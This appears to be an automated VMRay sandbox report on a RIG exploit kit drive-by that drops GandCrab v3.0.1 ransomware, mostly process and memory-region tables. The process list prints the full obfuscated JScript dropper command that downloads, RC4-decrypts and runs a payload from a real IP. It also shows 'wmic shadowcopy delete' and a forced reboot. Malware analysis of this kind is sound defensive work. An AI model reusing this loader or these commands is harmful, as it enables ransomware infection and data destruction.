RIG EK Drops GandCrab v3.0.1 | Sequential Behavior
Try VMRay Analyzer
VTI SCORE: 100/100
Target: win7_64_sp1 | ie
Classification: Dropper, Trojan, Downloader, Ransomware

http://youtubeconverter.slyip.net/WpLTQb?browser=ie&countryname=United+States

URL

Created at 2018-05-11 13:20:00

Notifications (2/4)

Due to a reputation service error, no query could be made to determine the reputation status of any contacted URL.

Some extracted files may be missing in the report since the maximum number of extracted files was reached during the analysis. You can increase the limit in the configuration settings.

Some memory dumps may be missing in the reports since the total dump size limit was reached during the analysis. You can increase the limit in the configuration settings.

Monitored Processes

Process Overview
»
ID PID Monitor Reason Integrity Level Image Name Command Line Origin ID
#1 0x8e4 Analysis Target Medium iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" about:blank -
#2 0x938 Child Process Medium iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2276 CREDAT:14337 #1
#3 0xa6c Child Process Medium cmd.exe cmd.exe /q /c cd /d "%tmp%" && echo /**/function V(k){var y=a(e+"."+e+/**/"Reques\x74.5.1");T="G";y["se"+"tProxy"](n);y["o"+"pen"](T+"ET",k(1),1);y["Option"](n)=k(2);y.send();y["Wai"+"tForResponse"]();W="respo"+"nseText";if(40*5==y.status)return _(y[W],k(n))};function _(k,e){for(var l=0,n,c=[],F=255,S=String,q=[],b=0;256^>b;b++)c[b]=b;ta="charCodeAt";for(b=0;256^>b;b++)l=l+c[b]+e[ta](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q["join"]("")};try{M="WSc";u=this[M+"ript"],o="Object";P=(""+u).split(" ")[1],M="indexOf",m=u.Arguments,e="WinHTTP",Z="cmd",U="DEleTefIle",a=Function/**/("QW","return u.Create"+o+"(QW)"),q=a(P+"ing.FileSystem"+o),s=a("ADO"+"DB.Stream"),j=a("W"+P+".Shell"),x="b"+Math.floor(Math.random() * 57)+".",p="exe",n=0,K=u[P+"FullName"],E="."+p;s.Type=2;s.Charset="iso-8859-1";try{v=V(m)}catch(W){v=V(m)};Q="PE\x00\x00";d=v.charCodeAt(21+v[M](Q));s.Open();h="dll";if(037^<d){var z=1;x+=h}else x+=p;s.WriteText(v);s.savetofile(x,2);C=" /c ";s.Close();i="regs";z^&^&(x=i+"vr32"+E+" /s "+x);j["run"](Z+E+C+x,0)}catch(EE){};q[U](K);>u32.tmp && start wscript //B //E:JScript u32.tmp "LZytas3d" "http://95.142.39.142/?MTAzNDE3&ofvcTlM&NOhFPrkEXYygcYr=c2Vh&XFZaDrsXTiVcOS=c2Vh&CQXjFXpCD=bWF0Y2h1cA==&uZwiNDOCVY=c3BvcnQ=&DGPafWFTVR=c2My&fdfsdf3gf=xXzQMvWebRXQCJ3EKvncT6NEMVHRHkCL2YqdmrHVefjaelWkzrfFTF_yozKATgSG6_dtdfJR&t4dsdfa4=DQbiiUHRfwQ1n49cBwsS9K6n20XUnUefh8SH-UCEYA5M-pOUFLcz2VX9yLMkc8Mm90vC62Jg&KMWDJCCKgTcdNl=cmVzb3J0&wAORzkZnO=cmVzb3J0" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)" #2
#4 0xa84 Child Process Medium wscript.exe wscript //B //E:JScript u32.tmp "LZytas3d" "http://95.142.39.142/?MTAzNDE3&ofvcTlM&NOhFPrkEXYygcYr=c2Vh&XFZaDrsXTiVcOS=c2Vh&CQXjFXpCD=bWF0Y2h1cA==&uZwiNDOCVY=c3BvcnQ=&DGPafWFTVR=c2My&fdfsdf3gf=xXzQMvWebRXQCJ3EKvncT6NEMVHRHkCL2YqdmrHVefjaelWkzrfFTF_yozKATgSG6_dtdfJR&t4dsdfa4=DQbiiUHRfwQ1n49cBwsS9K6n20XUnUefh8SH-UCEYA5M-pOUFLcz2VX9yLMkc8Mm90vC62Jg&KMWDJCCKgTcdNl=cmVzb3J0&wAORzkZnO=cmVzb3J0" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)" #3
#5 0xab8 Child Process Medium cmd.exe "C:\Windows\System32\cmd.exe" /c b32.exe #4
#6 0xad4 Child Process Medium b32.exe b32.exe #5
#10 0xb44 Child Process System (Elevated) nslookup.exe nslookup carder.bit ns1.wowservers.ru #6
#11 0x770 Child Process System (Elevated) nslookup.exe nslookup carder.bit ns1.wowservers.ru #6
#12 0x110 Child Process System (Elevated) wmic.exe "C:\Windows\system32\wbem\wmic.exe" shadowcopy delete #6
#14 0x7fc Child Process System (Elevated) cmd.exe "C:\Windows\System32\cmd.exe" /c shutdown -r -t 60 -f #6
#15 0x7e8 Child Process System (Elevated) iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome #6
#16 0x978 Child Process System (Elevated) shutdown.exe shutdown -r -t 60 -f #14
#17 0x9a4 Child Process System (Elevated) ie4uinit.exe "C:\Windows\SysWOW64\ie4uinit.exe" -ShowQLIcon #15
#18 0xbcc Child Process System (Elevated) iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2024 CREDAT:14337 #15
#20 0x394 Child Process System (Elevated) ssvagent.exe "C:\PROGRA~2\Java\jre7\bin\ssvagent.exe" -new #18

Behavior Information - Sequential View

Process #1: iexplore.exe
0 0
»
Information Value
ID #1
File Name c:\program files (x86)\internet explorer\iexplore.exe
Command Line "C:\Program Files (x86)\Internet Explorer\iexplore.exe" about:blank
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:00:19, Reason: Analysis Target
Unmonitor End Time: 00:02:24, Reason: Terminated by Timeout
Monitor Duration 00:02:05
Remarks No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0x8e4
Parent PID 0x564 (Unknown)
Is Created or Modified Executable False
Integrity Level Medium
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 974
0x 930
0x 92C
0x 928
0x 924
0x 914
0x 910
0x 90C
0x 908
0x 904
0x 900
0x 8FC
0x 8F8
0x 8F4
0x 8F0
0x 8EC
0x 8E8
0x 9C8
0x 9CC
0x 9E4
0x 828
0x 398
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x00026fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000030000 0x00030000 0x00031fff Pagefile Backed Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
locale.nls 0x00060000 0x000c6fff Memory Mapped File Readable False False False -
private_0x00000000000d0000 0x000d0000 0x001cffff Private Memory Readable, Writable True False False -
iexplore.exe.mui 0x001d0000 0x001d1fff Memory Mapped File Readable, Writable False False False -
private_0x00000000001e0000 0x001e0000 0x001e0fff Private Memory Readable, Writable True False False -
private_0x00000000001f0000 0x001f0000 0x001f0fff Private Memory Readable, Writable True False False -
private_0x0000000000200000 0x00200000 0x0020ffff Private Memory Readable, Writable True False False -
private_0x0000000000210000 0x00210000 0x0024ffff Private Memory Readable, Writable True False False -
oleaccrc.dll 0x00250000 0x00250fff Memory Mapped File Readable False False False -
pagefile_0x0000000000260000 0x00260000 0x00261fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000270000 0x00270000 0x00271fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000280000 0x00280000 0x00281fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000290000 0x00290000 0x00290fff Pagefile Backed Memory Readable, Writable True False False -
index.dat 0x002a0000 0x002affff Memory Mapped File Readable, Writable True False False -
index.dat 0x002b0000 0x002b7fff Memory Mapped File Readable, Writable True False False -
index.dat 0x002c0000 0x002cffff Memory Mapped File Readable, Writable True False False -
pagefile_0x00000000002d0000 0x002d0000 0x002d0fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x00000000002e0000 0x002e0000 0x002e0fff Pagefile Backed Memory Readable True False False -
private_0x00000000002f0000 0x002f0000 0x002f0fff Private Memory Readable, Writable True False False -
private_0x0000000000300000 0x00300000 0x00300fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000310000 0x00310000 0x00310fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000320000 0x00320000 0x00320fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000330000 0x00330000 0x00331fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000340000 0x00340000 0x003bffff Private Memory Readable, Writable True False False -
private_0x00000000003c0000 0x003c0000 0x003fffff Private Memory Readable, Writable True False False -
private_0x0000000000400000 0x00400000 0x0043ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000440000 0x00440000 0x004adfff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000004b0000 0x004b0000 0x005affff Private Memory Readable, Writable True False False -
pagefile_0x00000000005b0000 0x005b0000 0x00737fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000740000 0x00740000 0x008c0fff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x008d0000 0x00b9efff Memory Mapped File Readable False False False -
private_0x0000000000ba0000 0x00ba0000 0x00c9ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000ca0000 0x00ca0000 0x00ca1fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000cb0000 0x00cb0000 0x00cb1fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000cc0000 0x00cc0000 0x00cc0fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000cd0000 0x00cd0000 0x00d0ffff Private Memory Readable, Writable True False False -
private_0x0000000000d10000 0x00d10000 0x00d4ffff Private Memory Readable, Writable True False False -
private_0x0000000000d50000 0x00d50000 0x00d8ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000d90000 0x00d90000 0x00d91fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000da0000 0x00da0000 0x00da0fff Pagefile Backed Memory Readable True False False -
private_0x0000000000db0000 0x00db0000 0x00dcffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000dd0000 0x00dd0000 0x00dd0fff Pagefile Backed Memory Readable True False False -
private_0x0000000000de0000 0x00de0000 0x00de1fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000df0000 0x00df0000 0x00eeffff Private Memory Readable, Writable True False False -
private_0x0000000000ef0000 0x00ef0000 0x00feffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000ff0000 0x00ff0000 0x00ff0fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000001000000 0x01000000 0x01000fff Private Memory Readable, Writable True False False -
private_0x0000000001010000 0x01010000 0x0110ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000001110000 0x01110000 0x01187fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000001190000 0x01190000 0x01192fff Private Memory Readable, Writable True False False -
private_0x00000000011a0000 0x011a0000 0x0129ffff Private Memory Readable, Writable True False False -
private_0x00000000012a0000 0x012a0000 0x012a2fff Private Memory Readable, Writable True False False -
private_0x00000000012b0000 0x012b0000 0x012b0fff Private Memory Readable, Writable True False False -
private_0x00000000012c0000 0x012c0000 0x012c2fff Private Memory Readable, Writable True False False -
private_0x00000000012d0000 0x012d0000 0x012d2fff Private Memory Readable, Writable True False False -
iexplore.exe 0x012e0000 0x01385fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000001390000 0x01390000 0x0278ffff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000002790000 0x02790000 0x027ecfff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000027f0000 0x027f0000 0x02801fff Private Memory Readable, Writable True False False -
private_0x0000000002810000 0x02810000 0x0284ffff Private Memory Readable, Writable True False False -
private_0x0000000002850000 0x02850000 0x02850fff Private Memory Readable, Writable True False False -
private_0x0000000002860000 0x02860000 0x02860fff Private Memory Readable, Writable True False False -
private_0x0000000002870000 0x02870000 0x0296ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000002970000 0x02970000 0x02970fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000002980000 0x02980000 0x02980fff Private Memory Readable, Writable True False False -
private_0x0000000002990000 0x02990000 0x02990fff Private Memory Readable, Writable True False False -
private_0x00000000029a0000 0x029a0000 0x029dffff Private Memory Readable, Writable True False False -
private_0x00000000029e0000 0x029e0000 0x029e3fff Private Memory Readable, Writable True False False -
private_0x00000000029f0000 0x029f0000 0x029f1fff Private Memory Readable, Writable True False False -
private_0x0000000002a00000 0x02a00000 0x02a3ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000002a40000 0x02a40000 0x02b1efff Pagefile Backed Memory Readable True False False -
private_0x0000000002b20000 0x02b20000 0x02b20fff Private Memory Readable, Writable True False False -
private_0x0000000002b30000 0x02b30000 0x02b30fff Private Memory Readable, Writable True False False -
pagefile_0x0000000002b40000 0x02b40000 0x02b40fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000002b50000 0x02b50000 0x02b8ffff Private Memory Readable, Writable True False False -
private_0x0000000002b90000 0x02b90000 0x02b9dfff Private Memory Readable, Writable True False False -
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db 0x02ba0000 0x02bbefff Memory Mapped File Readable True False False -
private_0x0000000002bc0000 0x02bc0000 0x02bc0fff Private Memory Readable, Writable True False False -
private_0x0000000002bd0000 0x02bd0000 0x02ccffff Private Memory Readable, Writable True False False -
private_0x0000000002cd0000 0x02cd0000 0x02cd0fff Private Memory Readable, Writable True False False -
private_0x0000000002ce0000 0x02ce0000 0x02ce0fff Private Memory Readable, Writable True False False -
private_0x0000000002cf0000 0x02cf0000 0x02d2ffff Private Memory Readable, Writable True False False -
private_0x0000000002d30000 0x02d30000 0x02d30fff Private Memory Readable, Writable True False False -
private_0x0000000002d40000 0x02d40000 0x02d40fff Private Memory Readable, Writable True False False -
private_0x0000000002d50000 0x02d50000 0x02d50fff Private Memory Readable, Writable True False False -
private_0x0000000002d60000 0x02d60000 0x02d60fff Private Memory Readable, Writable True False False -
private_0x0000000002d70000 0x02d70000 0x02e6ffff Private Memory Readable, Writable True False False -
private_0x0000000002e70000 0x02e70000 0x02eeffff Private Memory Readable, Writable True False False -
private_0x0000000002ef0000 0x02ef0000 0x02feffff Private Memory Readable, Writable True False False -
private_0x0000000002ff0000 0x02ff0000 0x02ff0fff Private Memory Readable, Writable True False False -
private_0x0000000003000000 0x03000000 0x03000fff Private Memory Readable, Writable True False False -
private_0x0000000003010000 0x03010000 0x03010fff Private Memory Readable, Writable True False False -
private_0x0000000003020000 0x03020000 0x03020fff Private Memory Readable, Writable True False False -
private_0x0000000003030000 0x03030000 0x0306ffff Private Memory Readable, Writable True False False -
private_0x0000000003070000 0x03070000 0x030affff Private Memory Readable, Writable True False False -
private_0x00000000030b0000 0x030b0000 0x030b0fff Private Memory Readable, Writable True False False -
private_0x00000000030c0000 0x030c0000 0x030c0fff Private Memory Readable, Writable True False False -
private_0x00000000030d0000 0x030d0000 0x031cffff Private Memory Readable, Writable True False False -
private_0x00000000031d0000 0x031d0000 0x031d0fff Private Memory Readable, Writable True False False -
private_0x00000000031e0000 0x031e0000 0x031e0fff Private Memory Readable, Writable True False False -
private_0x00000000031f0000 0x031f0000 0x031f0fff Private Memory Readable, Writable True False False -
private_0x0000000003200000 0x03200000 0x0323ffff Private Memory Readable, Writable True False False -
private_0x0000000003240000 0x03240000 0x03240fff Private Memory Readable, Writable True False False -
private_0x0000000003250000 0x03250000 0x03250fff Private Memory Readable, Writable True False False -
private_0x0000000003260000 0x03260000 0x03260fff Private Memory Readable, Writable True False False -
private_0x0000000003270000 0x03270000 0x032affff Private Memory Readable, Writable True False False -
private_0x00000000032b0000 0x032b0000 0x032bffff Private Memory Readable, Writable True False False -
private_0x00000000032c0000 0x032c0000 0x032c0fff Private Memory Readable, Writable True False False -
private_0x00000000032d0000 0x032d0000 0x032d0fff Private Memory Readable, Writable True False False -
private_0x00000000032e0000 0x032e0000 0x032e0fff Private Memory Readable, Writable True False False -
private_0x00000000032f0000 0x032f0000 0x032f0fff Private Memory Readable, Writable True False False -
private_0x0000000003300000 0x03300000 0x03300fff Private Memory Readable, Writable True False False -
private_0x0000000003310000 0x03310000 0x03310fff Private Memory Readable, Writable True False False -
private_0x0000000003320000 0x03320000 0x03320fff Private Memory Readable, Writable True False False -
private_0x0000000003330000 0x03330000 0x03330fff Private Memory Readable, Writable True False False -
private_0x0000000003340000 0x03340000 0x0334ffff Private Memory Readable, Writable True False False -
private_0x0000000003350000 0x03350000 0x0338ffff Private Memory Readable, Writable True False False -
private_0x0000000003390000 0x03390000 0x03390fff Private Memory Readable, Writable True False False -
private_0x00000000033a0000 0x033a0000 0x033a0fff Private Memory Readable, Writable True False False -
private_0x00000000033b0000 0x033b0000 0x033b0fff Private Memory Readable, Writable True False False -
private_0x00000000033c0000 0x033c0000 0x033fffff Private Memory Readable, Writable True False False -
private_0x0000000003400000 0x03400000 0x03400fff Private Memory Readable, Writable True False False -
private_0x0000000003410000 0x03410000 0x03410fff Private Memory Readable, Writable True False False -
private_0x0000000003420000 0x03420000 0x03420fff Private Memory Readable, Writable True False False -
private_0x0000000003430000 0x03430000 0x03430fff Private Memory Readable, Writable True False False -
private_0x0000000003440000 0x03440000 0x03442fff Private Memory Readable, Writable True False False -
private_0x0000000003450000 0x03450000 0x03450fff Private Memory Readable, Writable True False False -
pagefile_0x0000000003460000 0x03460000 0x03461fff Pagefile Backed Memory Readable True False False -
private_0x0000000003470000 0x03470000 0x0348ffff Private Memory Readable, Writable True False False -
msctf.dll.mui 0x03490000 0x03490fff Memory Mapped File Readable, Writable False False False -
pagefile_0x00000000034a0000 0x034a0000 0x034a0fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000034b0000 0x034b0000 0x035affff Private Memory Readable, Writable True False False -
pagefile_0x00000000035b0000 0x035b0000 0x035b0fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000035c0000 0x035c0000 0x035cdfff Private Memory Readable, Writable True False False -
private_0x00000000035d0000 0x035d0000 0x035d0fff Private Memory Readable, Writable True False False -
private_0x00000000035e0000 0x035e0000 0x036dffff Private Memory Readable, Writable True False False -
private_0x00000000036e0000 0x036e0000 0x037dffff Private Memory Readable, Writable True False False -
pagefile_0x00000000037e0000 0x037e0000 0x03bd2fff Pagefile Backed Memory Readable True False False -
private_0x0000000003be0000 0x03be0000 0x03be0fff Private Memory Readable, Writable True False False -
private_0x0000000003bf0000 0x03bf0000 0x03bf0fff Private Memory Readable, Writable True False False -
private_0x0000000003c00000 0x03c00000 0x03c00fff Private Memory Readable, Writable True False False -
private_0x0000000003c10000 0x03c10000 0x03c15fff Private Memory Readable, Writable True False False -
private_0x0000000003c20000 0x03c20000 0x03c5ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000003c60000 0x03c60000 0x03ce5fff Pagefile Backed Memory Readable, Writable True False False -
cversions.2.db 0x03cf0000 0x03cf3fff Memory Mapped File Readable True False False -
private_0x0000000003d00000 0x03d00000 0x03d00fff Private Memory Readable, Writable True False False -
For performance reasons, the remaining 203 entries are omitted.
The remaining entries can be found in flog.txt.
Process #2: iexplore.exe
53 6
»
Information Value
ID #2
File Name c:\program files (x86)\internet explorer\iexplore.exe
Command Line "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2276 CREDAT:14337
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:00:19, Reason: Child Process
Unmonitor End Time: 00:02:24, Reason: Terminated by Timeout
Monitor Duration 00:02:05
OS Process Information
»
Information Value
PID 0x938
Parent PID 0x8e4 (c:\program files (x86)\internet explorer\iexplore.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 970
0x 96C
0x 968
0x 964
0x 960
0x 95C
0x 958
0x 954
0x 950
0x 94C
0x 948
0x 944
0x 940
0x 93C
0x 980
0x 984
0x 98C
0x 990
0x 994
0x 9BC
0x 9D0
0x 9D4
0x 9D8
0x 0
0x 9DC
0x 9E0
0x AAC
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x00026fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000030000 0x00030000 0x00031fff Pagefile Backed Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
locale.nls 0x00060000 0x000c6fff Memory Mapped File Readable False False False -
iexplore.exe.mui 0x000d0000 0x000d1fff Memory Mapped File Readable, Writable False False False -
private_0x00000000000e0000 0x000e0000 0x000e0fff Private Memory Readable, Writable True False False -
private_0x00000000000f0000 0x000f0000 0x000f0fff Private Memory Readable, Writable True False False -
oleaccrc.dll 0x00100000 0x00100fff Memory Mapped File Readable False False False -
pagefile_0x0000000000110000 0x00110000 0x00111fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000120000 0x00120000 0x00120fff Pagefile Backed Memory Readable True False False -
private_0x0000000000130000 0x00130000 0x0016ffff Private Memory Readable, Writable True False False -
private_0x0000000000170000 0x00170000 0x0026ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000270000 0x00270000 0x003f7fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000400000 0x00400000 0x00401fff Pagefile Backed Memory Readable True False False -
private_0x0000000000410000 0x00410000 0x00410fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000420000 0x00420000 0x00420fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000430000 0x00430000 0x0043ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000440000 0x00440000 0x00441fff Pagefile Backed Memory Readable True False False -
private_0x0000000000450000 0x00450000 0x00450fff Private Memory Readable, Writable True False False -
private_0x0000000000460000 0x00460000 0x004dffff Private Memory Readable, Writable True False False -
pagefile_0x00000000004e0000 0x004e0000 0x00660fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000670000 0x00670000 0x00671fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000680000 0x00680000 0x00681fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000690000 0x00690000 0x006cffff Private Memory Readable, Writable True False False -
private_0x00000000006d0000 0x006d0000 0x007cffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x007d0000 0x00a9efff Memory Mapped File Readable False False False -
pagefile_0x0000000000aa0000 0x00aa0000 0x00b7efff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000b80000 0x00b80000 0x00bedfff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000bf0000 0x00bf0000 0x00bf1fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000c00000 0x00c00000 0x00c00fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000c10000 0x00c10000 0x00c10fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000c20000 0x00c20000 0x00c20fff Pagefile Backed Memory Readable, Writable True False False -
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db 0x00c30000 0x00c4efff Memory Mapped File Readable True False False -
pagefile_0x0000000000c50000 0x00c50000 0x00c50fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000c60000 0x00c60000 0x00c9ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000ca0000 0x00ca0000 0x00d17fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000d20000 0x00d20000 0x00d21fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000d30000 0x00d30000 0x00d6ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000d70000 0x00d70000 0x00d71fff Pagefile Backed Memory Readable True False False -
index.dat 0x00d80000 0x00d8ffff Memory Mapped File Readable, Writable True False False -
private_0x0000000000d90000 0x00d90000 0x00dcffff Private Memory Readable, Writable True False False -
index.dat 0x00dd0000 0x00dd7fff Memory Mapped File Readable, Writable True False False -
index.dat 0x00de0000 0x00deffff Memory Mapped File Readable, Writable True False False -
pagefile_0x0000000000df0000 0x00df0000 0x00df0fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000e00000 0x00e00000 0x00e1ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000e20000 0x00e20000 0x00e20fff Pagefile Backed Memory Readable True False False -
private_0x0000000000e30000 0x00e30000 0x00e31fff Private Memory Readable, Writable True False False -
private_0x0000000000e40000 0x00e40000 0x00f3ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000f40000 0x00f40000 0x00f40fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000f50000 0x00f50000 0x00f52fff Pagefile Backed Memory Readable True False False -
private_0x0000000000f60000 0x00f60000 0x00f9ffff Private Memory Readable, Writable True False False -
private_0x0000000000fa0000 0x00fa0000 0x00fa3fff Private Memory Readable, Writable True False False -
private_0x0000000000fb0000 0x00fb0000 0x00fc7fff Private Memory Readable, Writable True False False -
private_0x0000000000fd0000 0x00fd0000 0x00fdffff Private Memory Readable, Writable True False False -
private_0x0000000000fe0000 0x00fe0000 0x010dffff Private Memory Readable, Writable True False False -
private_0x00000000010e0000 0x010e0000 0x010e0fff Private Memory Readable, Writable True False False -
private_0x00000000010f0000 0x010f0000 0x010fffff Private Memory - True False False -
private_0x0000000001100000 0x01100000 0x0110ffff Private Memory Readable, Writable True False False -
private_0x0000000001110000 0x01110000 0x0120ffff Private Memory Readable, Writable True False False -
private_0x0000000001210000 0x01210000 0x0121ffff Private Memory Readable, Writable True False False -
private_0x0000000001220000 0x01220000 0x0122ffff Private Memory Readable, Writable True False False -
private_0x0000000001230000 0x01230000 0x0123ffff Private Memory Readable, Writable True False False -
private_0x0000000001240000 0x01240000 0x0124ffff Private Memory Readable, Writable True False False -
private_0x0000000001250000 0x01250000 0x0128ffff Private Memory Readable, Writable True False False -
private_0x0000000001290000 0x01290000 0x0129ffff Private Memory Readable, Writable True False False -
private_0x00000000012a0000 0x012a0000 0x012affff Private Memory Readable, Writable True False False -
private_0x00000000012b0000 0x012b0000 0x012bffff Private Memory Readable, Writable True False False -
private_0x00000000012c0000 0x012c0000 0x012cffff Private Memory Readable, Writable True False False -
pagefile_0x00000000012d0000 0x012d0000 0x012d0fff Pagefile Backed Memory Readable, Writable True False False -
iexplore.exe 0x012e0000 0x01385fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000001390000 0x01390000 0x0278ffff Pagefile Backed Memory Readable True False False -
private_0x0000000002790000 0x02790000 0x02790fff Private Memory Readable, Writable, Executable True False False -
pagefile_0x00000000027a0000 0x027a0000 0x027a0fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000027b0000 0x027b0000 0x027bffff Private Memory Readable, Writable True False False -
pagefile_0x00000000027c0000 0x027c0000 0x027c0fff Pagefile Backed Memory Readable True False False -
private_0x00000000027d0000 0x027d0000 0x0280ffff Private Memory Readable, Writable True False False -
private_0x0000000002810000 0x02810000 0x0290ffff Private Memory Readable, Writable True False False -
private_0x0000000002910000 0x02910000 0x02b0ffff Private Memory Readable, Writable True False False -
private_0x0000000002b10000 0x02b10000 0x02c0ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000002c10000 0x02c10000 0x02c12fff Pagefile Backed Memory Readable True False False -
private_0x0000000002c20000 0x02c20000 0x02c23fff Private Memory Readable, Writable True False False -
private_0x0000000002c30000 0x02c30000 0x02c47fff Private Memory Readable, Writable True False False -
private_0x0000000002c50000 0x02c50000 0x02c5ffff Private Memory Readable, Writable True False False -
private_0x0000000002c60000 0x02c60000 0x02c9ffff Private Memory Readable, Writable True False False -
private_0x0000000002ca0000 0x02ca0000 0x02ca0fff Private Memory Readable, Writable True False False -
private_0x0000000002cb0000 0x02cb0000 0x02cbffff Private Memory - True False False -
private_0x0000000002cc0000 0x02cc0000 0x02ccffff Private Memory Readable, Writable True False False -
private_0x0000000002cd0000 0x02cd0000 0x02cdffff Private Memory Readable, Writable True False False -
private_0x0000000002ce0000 0x02ce0000 0x02ceffff Private Memory Readable, Writable True False False -
private_0x0000000002cf0000 0x02cf0000 0x02cfffff Private Memory Readable, Writable True False False -
private_0x0000000002d00000 0x02d00000 0x02d0ffff Private Memory Readable, Writable True False False -
private_0x0000000002d10000 0x02d10000 0x02e0ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000002e10000 0x02e10000 0x03202fff Pagefile Backed Memory Readable True False False -
private_0x0000000003210000 0x03210000 0x0330ffff Private Memory Readable, Writable True False False -
index.dat 0x03310000 0x03317fff Memory Mapped File Readable, Writable True False False -
acroiehelper.dll 0x03320000 0x0332cfff Memory Mapped File Readable False False False -
ieframe.dll 0x03330000 0x03341fff Memory Mapped File Readable False False False -
